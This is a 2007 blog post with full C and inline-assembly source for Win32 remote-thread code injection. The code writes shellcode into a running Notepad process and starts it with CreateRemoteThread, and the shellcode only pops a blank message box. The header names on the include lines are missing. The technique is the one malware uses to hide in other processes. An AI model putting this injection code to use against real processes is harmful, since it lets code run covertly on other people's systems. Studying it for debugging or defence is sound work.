MAYA SOUND

lunes, 15 de octubre de 2007

Code Injection - Win32

The following example code, basically locates Notepad instance, and injected code into it - that pops a blank message box. It works only in Win2K and above [ tested it only on WinXP SP2 ].

In your project settings, turn off incremental compilation and linking, otherwise, code-size detection may fail.


#include
#include
#include

#pragma code_seg(".injseg")
__declspec( naked ) static DWORD WINAPI InjectCode(LPVOID lpParameter)
{
__asm
{
call get_delta
get_delta:
pop ebp
sub ebp, offset get_delta

lea esi, dword ptr [ebp + addrMessageBox]
mov eax, dword ptr [esi]

push MB_OK
push 0
push 0
push NULL
call eax

lea esi, dword ptr [ebp + addrExitProcess]
mov eax, dword ptr [esi]
push 0
call eax

__emit 6Bh //k
__emit 65h //e
__emit 72h //r
__emit 6Eh //n
__emit 65h //e
__emit 6Ch //l
__emit 33h //3
__emit 32h //2
__emit 2Eh //.
__emit 64h //d
__emit 6Ch //l
__emit 6Ch //l
__emit 00h //\0
__emit 00h //\0

addrMessageBox:
__emit 00h
__emit 00h
__emit 00h
__emit 00h

addrExitProcess:
__emit 00h
__emit 00h
__emit 00h
__emit 00h
}
}

static void InjectCode_EndMarker (void){}

#pragma code_seg()
#pragma comment(linker, "/SECTION:.injseg,RWX")

BOOL DoSomeInjection(DWORD dwProcessId)
{
BOOL bRet = FALSE;
BOOL bOK = FALSE;
HANDLE hProcess = NULL;
HANDLE hRemoteThread = NULL;
LPVOID lpInjectCode = NULL;
const DWORD dwCodeSize = ((LPBYTE) InjectCode_EndMarker - (LPBYTE) InjectCode);
DWORD dwTemp = 0;

do
{
*(((LPDWORD)InjectCode_EndMarker) - 2) = (DWORD)&MessageBoxA;
*(((LPDWORD)InjectCode_EndMarker) - 1) = (DWORD)&ExitProcess;


hProcess = OpenProcess( PROCESS_ALL_ACCESS,
FALSE,
dwProcessId
);

if(NULL == hProcess)
{
_tprintf(_T("OpenProcess Failed!\n"));
break;
}

lpInjectCode = VirtualAllocEx(
hProcess,
NULL,
dwCodeSize,
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE
);

if(NULL == lpInjectCode)
{
_tprintf(_T("VirtualAllocEx Failed!\n"));
break;
}

bOK = WriteProcessMemory(hProcess, lpInjectCode, (LPVOID)InjectCode, dwCodeSize, &dwTemp);

if(FALSE == bOK)
{
_tprintf(_T("WriteProcessMemory Failed!\n"));
break;
}

hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpInjectCode, NULL, 0, NULL);

if(NULL == hRemoteThread)
{
_tprintf(_T("CreateRemoteThread Failed!\n"));
break;
}

WaitForSingleObject( hRemoteThread, INFINITE);
bRet = TRUE;
} while(false);

if(NULL != lpInjectCode)
{
VirtualFreeEx( hProcess, lpInjectCode, dwCodeSize, MEM_RELEASE);
lpInjectCode = NULL;
}

if(NULL != hRemoteThread)
{
CloseHandle(hRemoteThread);
hRemoteThread = NULL;
}

if(NULL != hProcess)
{
CloseHandle(hProcess);
hProcess = NULL;
}

return bRet;
}

int main(int argc, char* argv[])
{
DWORD dwProcId = 0;
HWND hwnd = FindWindow("Notepad", NULL);
GetWindowThreadProcessId( hwnd, &dwProcId);
DoSomeInjection(dwProcId);
return 0;
}
Publicado por en

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)